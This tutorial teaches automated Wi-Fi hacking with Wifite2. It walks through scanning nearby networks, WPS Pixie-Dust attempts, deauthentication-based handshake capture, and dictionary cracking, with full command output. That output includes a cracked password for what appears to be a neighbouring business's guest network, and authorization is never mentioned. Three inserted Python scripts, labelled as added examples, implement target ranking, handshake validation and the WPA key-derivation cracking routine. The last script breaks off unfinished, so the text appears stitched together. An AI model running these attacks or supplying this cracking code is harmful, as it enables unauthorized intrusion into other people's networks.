
How to automate Wi-Fi Hacking with Wifite2 «Zero byte :: WonderHowTo



There are many ways to attack a Wi-Fi network. The type of encryption, the manufacturer's settings, and the number of connected clients all dictate how easy a target is to attack and which method works best. Wifite2 is a powerful tool that automates Wi-Fi hacking, letting you select targets within range and leaving it to the script to choose the best strategy for each network.

Wifite2 vs Wifite

Wifite has been around for a long time and was one of the first Wi-Fi hacking tools I was introduced to. Along with Besside-ng, automated Wi-Fi hacking scripts allowed script kiddies to have a significant effect without knowing much about how the script worked. Compared to Besside-ng, the original Wifite was very thorough in using every available tool to attack a network, but it could also be very slow.

One of the best features of the original Wifite was that it performed a Wi-Fi site survey before attacking nearby networks, letting an attacker easily target one, some, or all neighboring networks. By presenting the available targets in an easily understood format, even a beginner can see which attacks are most likely to work against a given network.

The original Wifite would automatically attack WPA networks by attempting to capture a handshake or by using Reaver to brute-force the WPS setup PIN of the target network. While this approach was effective, it could take eight hours or more to complete.

The updated Wifite2 is much faster, completing attacks in less time and relying on more refined tactics than the previous version. Because of this, Wifite2 is a more serious and powerful Wi-Fi hacking tool than the original Wifite.

Attack Flow for Wi-Fi Hacking

Wifite2 follows a simple but effective workflow to hack nearby networks as quickly as possible. It pushes each tactic it tries to its practical limit and then moves on, even attempting to crack handshakes as it captures them.

In the first step, Wifite2 scans all channels looking for networks within range. It ranks the networks it detects by signal strength, because merely detecting a network does not guarantee that you can communicate with it reliably.

Ordering targets from strongest to weakest signal means the reconnaissance phase gathers both which networks exist and which hacking techniques they may be vulnerable to. Because of the way Wifite2 is organized, it is also easy to add a directional Wi-Fi antenna and use Wifite2 to locate the source of a nearby Wi-Fi network while performing the site survey.

After the site survey is complete, every target listed shows whether it has associated clients, whether the network is advertising WPS, and what type of encryption it uses. Based on this, an attacker can pick any single target, a group of targets, or all targets and launch attacks based on the information collected.

Wifite2 then works through the target list, starting with the fastest and easiest attacks, such as WPS Pixie-Dust, which can recover a password in seconds, and ending with slower, less certain tactics such as hunting for weak passwords with a dictionary attack. If an attack fails or takes too long, Wifite2 moves on to the next applicable attack rather than wasting hours as its predecessor was prone to do.

What You Need

To get started, you need a Wi-Fi network adapter that you can put into monitor mode. That means choosing one that is compatible with Kali Linux, which we have several excellent guides on.

Wifite2 is installed on Kali Linux by default, so I recommend either running Kali in a virtual machine or dual-booting it on a laptop. You can use Wifite2 on other Linux systems, but I won't cover the installation there because this guide assumes you are using Kali Linux.

Recommended adapter: Alfa AWUS036NHA

Step 1: Install Wifite2

If you do not already have Wifite2 installed on your system, you can install it from the GitHub repository. First, clone the repository by opening a terminal window and typing the following commands.

  git clone https://github.com/derv82/wifite2.git
  cd wifite2
  sudo python setup.py install

That should download and install Wifite2 on your system. To check that it worked, run wifite -h to see information about the installed version.

  wifite -h

   .               .
 .´  ·  .     .  ·  `.  wifite 2.1.6
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´

optional arguments:
  -h, --help            show this help message and exit

SETTINGS:
  -v, --verbose         Shows more options (-h -v). Prints commands and outputs. (default: quiet)
  -i [interface]        Wireless interface to use (default: choose first or ask)
  -c [channel]          Wireless channel to scan (default: all channels)
  -mac, --random-mac    Randomize wireless card MAC address (default: off)
  -p [scan_time]        Pillage: Attack all targets after scan_time seconds
  --kill                Kill processes that conflict with Airmon/Airodump (default: off)
  --clients-only, -co   Only show targets that have associated clients (default: off)
  --nodeauths           Passive mode: Never deauthenticates clients (default: deauth targets)

WEP:
  --wep                 Filter to only display WEP-encrypted networks (default: off)
  --require-fakeauth    Fails attacks if fake-auth fails (default: off)
  --keep-ivs            Retain .IVS files and reuse when cracking (default: off)

WPA:
  --wpa                 Filter to only display WPA-encrypted networks (includes WPS)
  --new-hs              Captures new handshakes, ignores existing handshakes in ./hs (default: off)
  --dict [file]         File containing passwords for cracking (default: /usr/share/wordlists/fern-wifi/common.txt)

WPS:
  --wps                 Filter to only display WPS-enabled networks
  --bully               Use bully instead of reaver for WPS attacks (default: reaver)
  --no-wps              NEVER use WPS (Pixie-Dust) attacks on non-WEP networks (default: off)
  --wps-only            ALWAYS use WPS (Pixie-Dust) attacks on non-WEP networks (default: off)

EVIL TWIN:
  -ev, --eviltwin       Use the "Evil Twin" attack against all targets (default: off)

COMMANDS:
  --cracked             Display previously-cracked access points
  --check [file]        Check a .cap file (or all hs/*.cap files) for WPA handshakes
  --crack               Show commands to crack a captured handshake

Step 2: Connect your Wi-Fi card

With Wifite2 installed, plug in your Kali Linux compatible wireless network adapter. Wifite2 not only selects a wireless adapter automatically but also puts it into monitor mode for you, so there is nothing else to do after connecting the adapter.

Step 3: Set Flags & Find a Target

If we know which channel we want to attack, we can select it by adding the -c flag followed by the channel number. Otherwise, running Wifite2 is as simple as typing wifite and letting the script collect information.

  wifite -c 11

   .               .
 .´  ·  .     .  ·  `.  wifite 2.1.6
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´

[+] option: scanning for targets on channel 11
[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 13595)
[!] if you have problems: kill -9 PID or re-run wifite with --kill

[+] looking for wireless interfaces

   Interface    PHY     Driver        Chipset
   -----------------------------------------------------------------------
1. wlan0        phy3    ath9k_htc     Atheros Communications, Inc. AR9271 802.11n

[+] enabling monitor mode on wlan0... enabled wlan0mon

   NUM  ESSID                       CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1  Suicidegirls                11   WPA   48db    no
     2  Bourgeois Pig Guest         11   WPA   45db    no
     3  BPnet                       11   WPA   42db    no
     4  DirtyLittleBirdyFeet        11   WPA   32db    no       5
     5  ATT73qDwuI                  11   WPA   32db   yes
     6  SpanishWiFi                 11   WPA   24db    no
     7  Franklin Lower              11   WPA   20db    no       3
     8  Sonos                       11   WPA   11db    no
     9  Villa Carlotta              11   WPA   11db    no
    10  Sonos                       11   WPA   10db    no
[+] select target(s) (1-10) separated by commas, hyphens or all:

Here we scanned channel 11 and found 10 targets. Of these, two have clients connected, one has WPS enabled, and all use WPA security.

Step 4: Examine the Site Survey & Select Targets

From our survey, target 5 may be the best target. While its signal strength is not the best and it has no connected clients, it advertises WPS, and we can probably still get something to crack with the newer PMKID attack even if no one is connected (that attack depends on the access point including a PMKID in the first EAPOL message, which not every router does).

If we are looking for weak passwords, the first three networks have the strongest signal, while targets 4 and 7, which have clients attached, offer the best chance of quickly capturing a four-way handshake to brute-force later. If we want a particular network, now is the time to choose it. If we want the most promising networks, we can choose targets 4, 5, and 7, since a handshake is likely to be captured quickly and cracked if the WPS PIN is not cracked first.

If we want to focus on easy targets, we can tell the script to show only targets vulnerable to a certain type of attack. To show only WPS-enabled targets that may be vulnerable to Reaver or Bully attacks, run Wifite2 with the --wps flag.

  wifite --wps

   .               .
 .´  ·  .     .  ·  `.  wifite 2.1.6
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´

[+] option: targeting WPS-encrypted networks
[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 14824)
[!] if you have problems: kill -9 PID or re-run wifite with --kill

[+] looking for wireless interfaces

   Interface    PHY     Driver        Chipset
   -----------------------------------------------------------------------
1. wlan0        phy4    ath9k_htc     Atheros Communications, Inc. AR9271 802.11n

[+] enabling monitor mode on wlan0... enabled wlan0mon

   NUM  ESSID                       CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1  SBG6580E8                    1   WPA   45db   yes
     2  The Daily Planet             1   WPA   30db   yes       1
     3  ATT73qDwuI                  11   WPA   28db   yes
     4  birds-Wireless               2   WPA   23db   yes
[+] select target(s) (1-4) separated by commas, hyphens or all:

We can do the same with --wpa or --wep to show only targets using those types of encryption.
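The ranking, filtering and attack-ordering logic described in the Attack Flow section and applied in Steps 3 and 4 can be reproduced in a few lines. The script below is an added example, not Wifite2's own code or anything from the original article: it parses scan results in airodump-ng's CSV layout (the sample text is constructed, with ESSIDs echoing the survey above and made-up MACs and timestamps), counts associated clients per BSSID, applies --wps/--wpa/--wep/--clients-only style filters, ranks by signal strength and prints a target table in the same shape as Wifite2's. The WPS lookup table stands in for the WPS information Wifite2 collects separately during the scan.

```python
"""Target triage the way Wifite2's target list does it: rank, filter, order attacks.

Added example, not code from Wifite2 or the original article. The scan text
is constructed in airodump-ng's CSV layout; the WPS lookup is a stand-in for
the WPS data Wifite2 gathers separately.
"""
import csv
import io
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: an access-point section, a blank line, then a station
# section whose BSSID column ties each client to its access point.
AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:11:22:33:44:01, 2018-12-24 00:30:01, 2018-12-24 00:31:10, 11, 54, WPA2, CCMP, PSK, -52, 40, 0, 0.  0.  0.  0, 19, Bourgeois Pig Guest,
02:11:22:33:44:02, 2018-12-24 00:30:01, 2018-12-24 00:31:10,  1, 54, WPA2, CCMP, PSK, -66, 31, 0, 0.  0.  0.  0, 16, The Daily Planet,
02:11:22:33:44:03, 2018-12-24 00:30:02, 2018-12-24 00:31:10, 11, 54, WPA2, CCMP, PSK, -68, 29, 0, 0.  0.  0.  0, 10, ATT73qDwuI,
02:11:22:33:44:04, 2018-12-24 00:30:02, 2018-12-24 00:31:09, 11, 54, WPA2, CCMP, PSK, -68, 18, 0, 0.  0.  0.  0, 20, DirtyLittleBirdyFeet,
02:11:22:33:44:05, 2018-12-24 00:30:03, 2018-12-24 00:31:10,  6, 11, WEP, WEP, , -75, 22, 0, 0.  0.  0.  0, 6, OldCam,
02:11:22:33:44:06, 2018-12-24 00:30:03, 2018-12-24 00:31:10,  6, 54, OPN, , , -45, 30, 0, 0.  0.  0.  0, 10, CoffeeShop,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
C8:E0:EB:45:CD:45, 2018-12-24 00:30:05, 2018-12-24 00:31:10, -60, 12, 02:11:22:33:44:02,
F0:D5:BF:BD:D5:2B, 2018-12-24 00:30:07, 2018-12-24 00:31:08, -66, 3, 02:11:22:33:44:04,
6C:8D:C1:A8:E4:E9, 2018-12-24 00:30:09, 2018-12-24 00:31:10, -70, 8, 02:11:22:33:44:04,
AA:BB:CC:DD:EE:01, 2018-12-24 00:30:09, 2018-12-24 00:31:10, -70, 8, (not associated),
"""

# Constructed: WPS status per BSSID, as a WPS scanner such as wash reports it.
WPS_LOOKUP: Dict[str, bool] = {
    "02:11:22:33:44:01": False,
    "02:11:22:33:44:02": True,
    "02:11:22:33:44:03": True,
    "02:11:22:33:44:04": False,
}


@dataclass
class Target:
    essid: str
    bssid: str
    channel: int
    encryption: str        # "WPA" (WPA/WPA2), "WEP" or "OPN"
    power: int             # dB as Wifite2 prints it: airodump dBm + 100
    wps: Optional[bool]    # None when unknown (shown as n/a)
    clients: int = 0


def _encryption(privacy: str) -> str:
    privacy = privacy.strip().upper()
    if privacy.startswith("WPA"):
        return "WPA"
    if privacy.startswith("WEP"):
        return "WEP"
    return "OPN"


def parse_airodump_csv(text: str, wps_lookup: Dict[str, bool]) -> List[Target]:
    """Turn airodump-ng CSV output into Target records with client counts."""
    text = text.replace("\r\n", "\n").strip("\n")
    ap_section, _, station_section = text.partition("\n\n")
    clients: Dict[str, int] = {}
    for row in csv.DictReader(io.StringIO(station_section), skipinitialspace=True):
        bssid = (row.get("BSSID") or "").strip().upper()
        if bssid and bssid != "(NOT ASSOCIATED)":
            clients[bssid] = clients.get(bssid, 0) + 1
    targets: List[Target] = []
    for row in csv.DictReader(io.StringIO(ap_section), skipinitialspace=True):
        bssid = row["BSSID"].strip().upper()
        enc = _encryption(row["Privacy"])
        power = int(row["Power"].strip())
        if power < 0:                      # airodump reports dBm; Wifite2 shows dBm + 100
            power += 100
        targets.append(Target(
            essid=row["ESSID"].strip(), bssid=bssid, channel=int(row["channel"].strip()),
            encryption=enc, power=power,
            wps=wps_lookup.get(bssid) if enc == "WPA" else None,
            clients=clients.get(bssid, 0)))
    return targets


def filter_targets(targets: List[Target], wps: bool = False, wpa: bool = False,
                   wep: bool = False, clients_only: bool = False) -> List[Target]:
    """Apply --wps / --wpa / --wep / --clients-only style filters, strongest signal first."""
    keep = []
    for t in targets:
        if t.encryption == "OPN":          # nothing to crack on an open network
            continue
        if (wps and not t.wps) or (wpa and t.encryption != "WPA") \
                or (wep and t.encryption != "WEP") or (clients_only and t.clients == 0):
            continue
        keep.append(t)
    return sorted(keep, key=lambda t: t.power, reverse=True)


def attack_plan(t: Target) -> List[str]:
    """Fastest attack first, slowest last, as the article describes."""
    if t.encryption == "OPN":
        return []
    if t.encryption == "WEP":
        return ["wep-ivs"]                 # gather IVs, crack with aircrack-ng
    plan = []
    if t.wps:
        plan.append("wps-pixie-dust")      # offline PIN recovery, seconds on a weak AP
    plan.append("wpa-handshake")           # deauth clients if present, else wait for one
    plan.append("wpa-dictionary")          # offline crack of the handshake with --dict
    return plan


def format_target_table(targets: List[Target]) -> str:
    lines = ["  NUM  ESSID                      CH  ENCR  POWER  WPS?  CLIENT",
             "  ---  -------------------------  --  ----  -----  ----  ------"]
    for n, t in enumerate(targets, 1):
        wps = "n/a" if t.wps is None else ("yes" if t.wps else "no")
        client = str(t.clients) if t.clients else ""
        lines.append(f"  {n:>3}  {t.essid[:25]:<25}  {t.channel:>2}  {t.encryption:<4}"
                     f"  {t.power:>3}db  {wps:<4}  {client}")
    return "\n".join(lines)


if __name__ == "__main__":
    scan = parse_airodump_csv(AIRODUMP_CSV, WPS_LOOKUP)
    print(format_target_table(filter_targets(scan)))
    for target in filter_targets(scan, wps=True):
        print(target.essid, "->", attack_plan(target))
```

Pointed at a real airodump-ng CSV the parser works unchanged; the only piece Wifite2 gets from elsewhere is the WPS column.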

Step 5: Automate Attacks by Target Type

From the results list, let's choose a target with both WPS enabled and clients attached. After selecting the number of the network we want to attack, Wifite2 proceeds through the most appropriate attacks on that network.

  [+] (1/1) starting attacks against 69:96:43:69:D6:96 (The Daily Planet)
  [+] The Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
  [+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8:E0:EB:45:CD:45
  [+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients: 1, deauth: 11s, timeout: 7m59s)

  [+] successfully captured handshake
  [+] saving copy of handshake to hs/handshake_TheDailyPlanet_69-96-43-69-D6-96_2018-12-24T00-33-18.cap saved

  [+] analysis of captured handshake file:
  [+]   tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96
  [!]    pyrit: .cap file does not contain a valid handshake
  [+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
  [+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96

  [+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist

  [!] Failed to crack handshake: common.txt did not contain password
  [+] Finished attacking 1 target(s), exiting

Here we can see that while the WPS Pixie-Dust attack failed, we easily grabbed a handshake to attack. The Pixie-Dust attempt timed out fairly quickly, so we lost little time exploring it. Sometimes different wireless cards work better with different tools, and that is true of Reaver and Bully: if one does not work for you, try the other.

Wifite2 uses Reaver by default, but you can switch to Bully with the --bully flag.
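The analysis step above, where tshark, cowpatty and aircrack-ng accept the file while pyrit rejects it, comes down to which EAPOL-Key frames can be paired up, and each tool applies its own pairing rules. The script below is an added example, not code from Wifite2 or any of those tools: it classifies EAPOL-Key frames as messages 1 to 4 of the four-way handshake from the Key Information bits, then looks for a message 2 that can be paired with a message 1 (same replay counter) or a message 3 (replay counter plus one) from the same access point, which is the minimum a cracker needs. It works on fields already extracted from the frames rather than on a .cap file; the records are constructed, reusing the MACs from the run above and the Key Information values normally seen in a WPA2 (RSN) exchange.

```python
"""Decide whether a set of EAPOL-Key frames contains a crackable 4-way handshake.

Added example, not code from Wifite2, tshark, cowpatty, pyrit or aircrack-ng.
Operates on already-extracted EAPOL-Key fields; the sample frames below are
constructed (MACs from the article's run, standard WPA2 Key Information values).
"""
from dataclasses import dataclass
from typing import List, Optional

# Key Information bit masks of the EAPOL-Key frame (IEEE 802.11).
KEY_TYPE_PAIRWISE = 1 << 3
KEY_INSTALL = 1 << 6
KEY_ACK = 1 << 7
KEY_MIC = 1 << 8
KEY_SECURE = 1 << 9


@dataclass(frozen=True)
class EapolKey:
    src: str               # transmitter MAC
    dst: str               # receiver MAC
    key_info: int          # 16-bit Key Information field
    replay_counter: int
    nonce: bytes           # 32-byte Key Nonce
    mic: bytes             # 16-byte Key MIC (zeros when the MIC bit is clear)


def message_number(k: EapolKey) -> Optional[int]:
    """Classify an EAPOL-Key frame as message 1-4 of the 4-way handshake, or None."""
    if not k.key_info & KEY_TYPE_PAIRWISE:
        return None                      # group-key handshake, not useful here
    ack, mic = bool(k.key_info & KEY_ACK), bool(k.key_info & KEY_MIC)
    install, secure = bool(k.key_info & KEY_INSTALL), bool(k.key_info & KEY_SECURE)
    if ack and not mic:
        return 1                         # AP -> STA, carries the ANonce
    if ack and mic and install:
        return 3                         # AP -> STA, ANonce again, MICed
    if mic and not ack and not install:
        return 4 if secure else 2        # STA -> AP; only M2 carries the SNonce
    return None


@dataclass(frozen=True)
class Handshake:
    ap: str
    station: str
    anonce: bytes
    snonce: bytes
    m2: EapolKey           # the frame whose MIC a cracker recomputes
    complete: bool         # all four messages seen (not required for cracking)


def find_handshakes(frames: List[EapolKey]) -> List[Handshake]:
    """Pair each M2 with an M1 (same replay counter) or M3 (counter + 1) from its AP."""
    found: List[Handshake] = []
    for m2 in frames:
        if message_number(m2) != 2:
            continue
        ap, sta = m2.dst, m2.src
        pair = [f for f in frames if {f.src, f.dst} == {ap, sta}]
        m1 = [f for f in pair if message_number(f) == 1 and f.src == ap
              and f.replay_counter == m2.replay_counter]
        m3 = [f for f in pair if message_number(f) == 3 and f.src == ap
              and f.replay_counter == m2.replay_counter + 1]
        anonce_frame = m1[0] if m1 else (m3[0] if m3 else None)
        if anonce_frame is None:
            continue                     # no ANonce to go with this M2: not crackable
        m4 = [f for f in pair if message_number(f) == 4 and f.src == sta
              and f.replay_counter == m2.replay_counter + 1]
        found.append(Handshake(ap=ap, station=sta, anonce=anonce_frame.nonce,
                               snonce=m2.nonce, m2=m2, complete=bool(m1 and m3 and m4)))
    return found


def check_report(frames: List[EapolKey]) -> str:
    """One-line verdict in the style of Wifite2's --check output."""
    found = find_handshakes(frames)
    if not found:
        return ".cap file does not contain a valid handshake"
    return "valid handshake for " + ", ".join(sorted({h.ap for h in found}))


# Constructed capture: a full exchange plus a stray M1 from a second AP.
AP, STA = "69:96:43:69:D6:96", "C8:E0:EB:45:CD:45"
ANONCE, SNONCE = bytes(range(32)), bytes(range(100, 132))
FAKE_MIC = bytes.fromhex("1a" * 16)            # made-up MIC value
CAPTURED = [
    EapolKey(AP, STA, 0x008A, 1, ANONCE, bytes(16)),      # M1: ack, no MIC
    EapolKey(STA, AP, 0x010A, 1, SNONCE, FAKE_MIC),       # M2: MIC, secure bit clear
    EapolKey(AP, STA, 0x13CA, 2, ANONCE, FAKE_MIC),       # M3: ack, MIC, install, secure
    EapolKey(STA, AP, 0x030A, 2, bytes(32), FAKE_MIC),    # M4: MIC, secure, zero nonce
    EapolKey("78:96:84:00:B5:B0", "F0:D5:BF:BD:D5:2B", 0x008A, 7, bytes(range(32, 64)), bytes(16)),
]

if __name__ == "__main__":
    print(check_report(CAPTURED))
    for hs in find_handshakes(CAPTURED):
        print(hs.ap, hs.station, "complete" if hs.complete else "partial")
```

The replay-counter check is what rejects an M2 left over from an earlier, failed exchange; a tool that skips it can report a handshake that will never crack, which is one reason the four checkers in the output above can disagree.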

  wifite --wps --bully

   .               .
 .´  ·  .     .  ·  `.  wifite 2.1.6
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´

[+] option: using bully instead of reaver for WPS attacks
[+] option: targeting WPS-encrypted networks
[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 14824)
[!] if you have problems: kill -9 PID or re-run wifite with --kill

[+] looking for wireless interfaces
[+] using interface wlan0mon (already in monitor mode)
    you can specify the wireless interface with -i wlan0

   NUM  ESSID                       CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1  SBG6580E8                    1   WPA   46db   yes
     2  The Daily Planet             1   WPA   34db   yes       1
[+] select target(s) (1-2) separated by commas, hyphens or all: 2

[+] (1/1) starting attacks against 78:96:84:00:B5:B0 (The Daily Planet)
[+] The Daily Planet (44db) WPS Pixie-Dust: [4m0s] Failed: More than 100 timeouts
[+] The Daily Planet (34db) WPA Handshake capture: found existing handshake for The Daily Planet
[+] using handshake from hs/handshake_TheDailyPlanet_78-96-84-00-B5-B0_2018-12-24T00-33-18.cap

[+] analysis of captured handshake file:
[+]   tshark: .cap file contains a valid handshake for 78:96:84:00:b5:b0
[!]    pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 78:96:84:00:B5:B0

[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist

[!] Failed to crack handshake: common.txt did not contain password
[+] Finished attacking 1 target(s), exiting

While we did not get a better result with Bully, trying both is a good way to find out which one works best with your wireless adapter.

Step 6: Skip Attacks & Review Results

If Wifite2 is taking too long on a particular attack, we can skip it by pressing Ctrl-C, which brings up a menu asking whether we want to continue. From there, type c to skip to the next attack or s to stop Wifite2.

  [+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Trying PIN 12523146 (Deauth: Timeout) (Timeouts: 15)
  [!] interrupted

  [+] 1 attack(s) remain, do you want to continue?
  [+] type c to continue or s to stop:

If all we can get is a four-way handshake, we may want to supply a custom wordlist of password guesses to crack it. We can do this with the --dict flag, which sets the file containing the candidate passwords; by default it is /usr/share/wordlists/fern-wifi/common.txt. That list contains many common passwords, but you will want to use your own if you are serious about getting results.

Below we crack a captured handshake using a custom wordlist, passwords.txt.

  wifite --wpa --dict ./passwords.txt

   .               .
 .´  ·  .     .  ·  `.  wifite 2.1.6
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´

[+] option: using wordlist ./passwords.txt to crack WPA handshakes
[+] option: targeting WPA-encrypted networks
[!] conflicting process: NetworkManager (PID 419)
[!] conflicting process: wpa_supplicant (PID 585)
[!] conflicting process: dhclient (PID 7902)
[!] if you have problems: kill -9 PID or re-run wifite with --kill

[+] looking for wireless interfaces
[+] using interface wlan0mon (already in monitor mode)
    you can specify the wireless interface with -i wlan0

   NUM  ESSID                       CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1  Suicidegirls                11   WPA   58db   n/a
     2  Bourgeois Pig Guest         11   WPA   56db   n/a
     3  BPnet                       11   WPA   56db   n/a
     4  The Daily Planet             1   WPA   49db   n/a       1
     5  SBG6580E8                    1   WPA   49db   n/a
     6  Hyla Hair 2.4G               8   WPA   48db   n/a
     7  TWCWiFi Pass Point           1   WPA   46db   n/a
     8  HP-Print-B9 Officejet …      1   WPA   40db   n/a
     9  birds-Wireless               2   WPA   39db   n/a
    10  SpanishWiFi                 11   WPA   38db   n/a
[!] airodump exited unexpectedly (Code: 0) Command: airodump-ng wlan0mon -a -w /tmp/wifitei_l5H1/airodump --write-interval 1 --output-format pcap,csv
[+] select target(s) (1-10) separated by commas, hyphens or all: 2

[+] (1/1) starting attacks against DE:F2:86:EC:CA:A0 (Bourgeois Pig Guest)
[+] Bourgeois Pig Guest (57db) WPA Handshake capture: Discovered new client: F0:D5:BF:BD:D5:2B
[+] Bourgeois Pig Guest (58db) WPA Handshake capture: Discovered new client: 6C:8D:C1:A8:E4:E9
[+] Bourgeois Pig Guest (59db) WPA Handshake capture: Listening. (clients: 2, deauth: 14s, timeout: 8m1s)

[+] successfully captured handshake
[+] saving copy of handshake to hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap saved

[+] analysis of captured handshake file:
[+]   tshark: .cap file contains a valid handshake for de:f2:86:ec:ca:a0
[!]    pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (Bourgeois Pig Guest)
[+] aircrack: .cap file contains a valid handshake for DE:F2:86:EC:CA:A0

[+] Cracking WPA Handshake: Using aircrack-ng via passwords.txt wordlist
[+] Cracking WPA Handshake: 100.00% ETA: 0s @ 2234.0kps (current key: christmasham)
[+] Cracked WPA Handshake PSK: christmasham

[+] Access Point Name: Bourgeois Pig Guest
[+] Access Point BSSID: DE:F2:86:EC:CA:A0
[+] Encryption: WPA
[+] Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
[+] PSK (password): christmasham
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting

By supplying a good password list, we improve our chances of cracking a Wi-Fi network's password even when the faster WPS attacks fail.
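What aircrack-ng is doing at 2234 keys per second above is this: for each wordlist entry, stretch the candidate into a PMK with PBKDF2 (4096 HMAC-SHA1 rounds, salted with the SSID), expand it with the two MACs and two nonces into the PTK, and recompute the MIC on the captured message 2 with the first 16 bytes of that PTK. The script below is an added example, not Wifite2's or aircrack-ng's code. Its "capture" is constructed with the same derivation (SSID, MACs and the recovered password echo the run above; the nonces, replay counter and frame layout are made up), so it demonstrates the mechanics rather than cracking a real file; the one external check is the IEEE 802.11 test vector for PBKDF2. Key descriptor version 2 (HMAC-SHA1 MIC, the WPA2/CCMP case) is assumed; version 1 (HMAC-MD5) is handled, version 3 (AES-CMAC) is not.

```python
"""The arithmetic behind a WPA/WPA2 dictionary attack on a captured handshake.

Added example, not code from Wifite2 or aircrack-ng. The demo capture is
constructed with the same derivation, so it proves self-consistency plus the
IEEE 802.11 PBKDF2 test vector, nothing about a real capture.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# EAPOL-Key frame layout: 4-byte 802.1X header, then descriptor type(1),
# key_info(2), key_len(2), replay(8), nonce(32), iv(16), rsc(8), id(8),
# mic(16), data_len(2), data(...).  Hence these offsets.
KEY_INFO_OFF = 5
MIC_OFF, MIC_LEN = 81, 16


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PMK for WPA/WPA2-Personal: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def _prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    out = b""
    for i in range(5):                   # 5 x 20 bytes of SHA1 output >= 64 bytes
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return _prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the whole EAPOL frame with the MIC field zeroed."""
    zeroed = eapol[:MIC_OFF] + bytes(MIC_LEN) + eapol[MIC_OFF + MIC_LEN:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1   # version 3 (CMAC) not handled
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def build_eapol_m2(replay: int, snonce: bytes, mic: bytes = bytes(16),
                   key_info: int = 0x010A) -> bytes:
    """A message-2 EAPOL-Key frame (RSN descriptor, CCMP/PSK RSN IE as key data)."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = (struct.pack(">BHHQ", 2, key_info, 0, replay) + snonce + bytes(16)
            + bytes(8) + bytes(8) + mic + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    return struct.pack(">BBH", 2, 3, len(body)) + body   # 802.1X v2, type 3 = EAPOL-Key


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
                    snonce: bytes, eapol_m2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: PMK -> PTK -> KCK per candidate, then compare the MIC."""
    version = struct.unpack_from(">H", eapol_m2, KEY_INFO_OFF)[0] & 0x7
    captured_mic = eapol_m2[MIC_OFF:MIC_OFF + MIC_LEN]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # outside the WPA passphrase range: skip
            continue
        kck = wpa_ptk(wpa_psk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2, version), captured_mic):
            return candidate
    return None


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


# Constructed capture built with the derivation above (SSID/MACs from the article's run).
SSID = "Bourgeois Pig Guest"
AP_MAC, STA_MAC = mac_bytes("DE:F2:86:EC:CA:A0"), mac_bytes("F0:D5:BF:BD:D5:2B")
ANONCE, SNONCE = bytes(range(32)), bytes(range(100, 132))    # made-up nonces


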